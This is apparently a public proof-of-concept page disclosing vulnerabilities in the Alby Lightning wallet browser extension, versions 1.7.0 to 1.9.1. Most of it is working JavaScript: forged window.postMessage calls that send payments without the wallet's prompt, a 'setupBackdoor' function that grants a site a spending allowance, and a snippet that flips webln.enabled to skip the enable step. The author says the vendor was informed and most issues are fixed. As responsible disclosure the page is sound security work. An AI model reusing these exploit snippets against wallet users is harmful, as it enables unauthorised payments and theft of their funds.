🐝 Alby vulnerabilities PoC

This page demonstrates a few ways to bypass Alby's security features. The Alby team is informed and most of these issues have been fixed. Currently, there is no direct confirmation if a payment failed or worked on this page, so be careful not to spend all your sats here. This page is written in simple HTML and JavaScript. You can easily verify what it's doing using "Inspect Element".

Vulnerabilities in Alby 1.7.0 and below

These do nothing in recent versions

async function sendUsingWebLnExec() {
  await window.webln.execute("sendPayment", {
    paymentRequest: await getInvoice(1000),
  });
}

async function sendUsingPostMsg170() {
  window.postMessage(
    {
      application: "LBE",
      prompt: true,
      type: "sendPayment",
      args: {
        paymentRequest: await getInvoice(1000),
      },
    },
    "*"
  );
}

Vulnerabilities in Alby 1.8.0 and below

These should create a simple payment or "connect" dialog in more recent versions.

async function sendUsingPostMsg180() {
  window.postMessage(
    {
      application: "LBE",
      prompt: true,
      // If action is defined, it is prioritized in the code later, but only type is checked for safety
      // So action can be anything, it is not validated
      action: "sendPayment",
      type: "sendPaymentOrPrompt",
      args: {
        paymentRequest: await getInvoice(1000),
      },
    },
    "*"
  );
}

async function setupBackdoor() {
  // Add if non-existent
  window.postMessage(
    {
      application: "LBE",
      prompt: true,
      // If action is defined, it is prioritized in the code later, but only type is checked for safety
      // So action can be anything, it is not validated
      action: "addAllowance",
      type: "enable",
      args: {
        totalBudget: 100,
        host: "aarondewes.github.io",
        name: "Backdoor by Aaron's PoC",
        imageURL: "https://github.com/getAlby/website/blob/main/public/images/alby_icon_head_icon.png?raw=true",
        paymentRequest: await getInvoice(1000),
      },
    },
    "*"
  );
  // Otherwise update
  window.postMessage(
    {
      application: "LBE",
      prompt: true,
      action: "updateAllowance",
      type: "sendPaymentOrPrompt",
      args: {
        totalBudget: 100,
        enabled: true,
        paymentRequest: await getInvoice(1000),
      },
    },
    "*"
  );
}

Vulnerabilities in Alby 1.9.1 and below

These are not really dangerous, and only a minor issue

async function bypassEnableSend() {
  window.webln.enabled = true;
  await window.webln.sendPayment(await getInvoice(1000));
}